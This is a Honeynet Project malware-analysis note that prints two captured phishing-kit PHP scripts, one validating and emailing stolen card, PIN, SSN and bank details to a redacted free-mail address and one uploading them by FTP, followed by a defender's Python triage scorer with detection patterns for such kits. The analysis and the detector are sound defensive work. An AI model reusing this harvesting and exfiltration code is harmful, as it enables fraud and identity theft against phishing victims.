Honeynet Project
http://www.honeynet.org
Last Modified: 14th May, 2005
In this side note we analyse an example script that was used to validate the information entered by users into an HTML form on a phishing web site. First, the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.
<?php
$errchk=0;
$error = "None";
$badw="fuck pussy dick suck asshole";
//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
    $error="Invalid email address, please re-submit.";
    $errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
    $error="Invalid bank routing number, please re-submit.";
    $errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
    $error="Invalid card validation code, please re-submit.";
    $errchk=4;
}
//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
    $error="Invalid pin number, please re-submit.";
    $errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
    $error="Please enter your full name and re-submit.";
    $errchk=5;
}
else if(strlen($streetaddr)<1){
    $error="Please enter your address and re-submit.";
    $errchk=5;
}
else if(strlen($cityaddr)<1){
    $error="Please enter your city and re-submit.";
    $errchk=5;
}
else if(strlen($mmn)<1){
    $error="Please enter your Mother Maiden Name and re-submit.";
    $errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
    $error="Please enter your Date Of Birth and re-submit.";
    $errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$streetaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$cityaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$mmn)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
    $efile=fopen("/tmp/User.doc","r");
    fscanf($efile,"%s",$userid);
    fscanf($efile,"%s",$pass);
    fclose($efile);
    $timed = date("l dS of F Y h:i:s A");
    $ip = $_SERVER["REMOTE_ADDR"];
    $message="---------------------------------------------------------------------------- On $timed the user ($ip) wrote: CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";
    $message=$message."UserId - $userid";
    $message=$message."Password - $pass";
    $message=$message."Email - $email";
    $message=$message."Email Password - $emailp";
    $message=$message."Full Name - $username";
    $message=$message."Address - $streetaddr";
    $message=$message."City - $cityaddr";
    $message=$message."State - $stateprovaddr";
    $message=$message."Zip Code - $zipcodeaddr";
    $message=$message."Phone number - $phone";
    $message=$message."Country - $countryaddr";
    $message=$message."CVV - $cvv2";
    $message=$message."Bank Name - $bank";
    $message=$message."Bank Routing # - $bankr Checking Account # - $bankc Social Security Number - $ssn Card PIN Number - $ccp Mother's Maiden Name - $mmn Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy Driver Licence Number - $dln";
    mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n");
    header ("Location:xxxxISAPI.dll");
    //$muie = fopen("/tmp/eb.txt", "a");
    //fwrite($muie, $message);
    //fclose($muie);
    //include("cc-ftp.php");
    exit();
}
else {
    echo $error;
}
?>
The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:
<?php
include("r-config.php"); // the server login information
$fcon = ftp_connect($host);
if(@ftp_login($fcon, $user, $pass)) {
    ftp_put($fcon, $fremote, $flocal, FTP_ASCII);
}
else {
    $msg = "Unable to connect to host: $host with user: $user and pass: $pass. Please update me.";
    mail ("xxxxxx@xxxxxx","Ftpupdate","$msg","From:jmekeru <xxxxxx@xxxxxx>\n");
}
ftp_close($fcon);
?>
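As an added illustration for defenders, not part of the Honeynet Project's analysis or of the captured kit, the following Python triage heuristic scores PHP sources found on a compromised web server for the combination of traits seen in the two scripts above: references to sensitive form fields, an outbound channel (mail() or the FTP functions), a free-mail destination and a redirect after submission. The field-name list, the weights, the threshold and the two constructed samples (a condensed kit and a benign contact form) are assumptions of this example.

```python
import re

# Constructed sample: a condensed version of the data-processing script above.
KIT_SAMPLE = r'''<?php
if(strlen($ccnumber)<16){ $error="Invalid credit card number"; }
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){ $error="Invalid card validation code"; }
$message="CreditCard Number - $ccnumber ; CVV - $cvv2 ; Social Security Number - $ssn ; Card PIN Number - $ccp ; Mother's Maiden Name - $mmn";
mail("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n");
header("Location:xxxxISAPI.dll");
//include("cc-ftp.php");
?>'''

# Constructed sample: a benign feedback form that also calls mail().
BENIGN_SAMPLE = r'''<?php
if(strlen($name)<1){ $error="Please enter your name"; }
$body = "From $name: $comment";
mail("webmaster@example.com", "Site feedback", $body);
echo "Thanks!";
?>'''

# Indicator patterns (assumed names; extend the field list for other kits).
SENSITIVE_FIELDS = re.compile(r'\$(ccnumber|cvv2?|ssn|ccp|mmn|bankr|bankc|dln)\b', re.I)
EXFIL_CALLS = re.compile(r'\b(mail|ftp_put|ftp_login|fsockopen|curl_exec)\s*\(', re.I)
FREEMAIL_DEST = re.compile(r'@(hotmail|yahoo|gmail|aol)\.com', re.I)
REDIRECT_OUT = re.compile(r'header\s*\(\s*["\']Location:', re.I)
KEYWORD_HINTS = re.compile(r'credit ?card|social security|maiden name|pin number', re.I)

def score_php(src):
    """Return (score, findings) for one PHP source string."""
    findings = {}
    fields = {m.group(1).lower() for m in SENSITIVE_FIELDS.finditer(src)}
    calls = {m.group(1).lower() for m in EXFIL_CALLS.finditer(src)}
    if fields:
        findings['sensitive_fields'] = sorted(fields)
    if calls:
        findings['exfil_calls'] = sorted(calls)
    findings['freemail_destination'] = bool(FREEMAIL_DEST.search(src))
    findings['redirect_after_submit'] = bool(REDIRECT_OUT.search(src))
    findings['credential_keywords'] = bool(KEYWORD_HINTS.search(src))
    # Collected fields combined with an outbound channel is the core of a kit;
    # a lone mail() call (any contact form) scores well below the threshold.
    score = min(len(fields), 3) * 2
    score += 2 if calls else 0
    score += 2 if findings['freemail_destination'] else 0
    score += 1 if findings['redirect_after_submit'] else 0
    score += 1 if findings['credential_keywords'] else 0
    return score, findings

def is_likely_kit(src, threshold=6):
    """True when the file carries enough combined indicators to warrant review."""
    return score_php(src)[0] >= threshold
```

Run it over every .php file under the web root and review the hits by hand; the score is a triage aid, not a verdict.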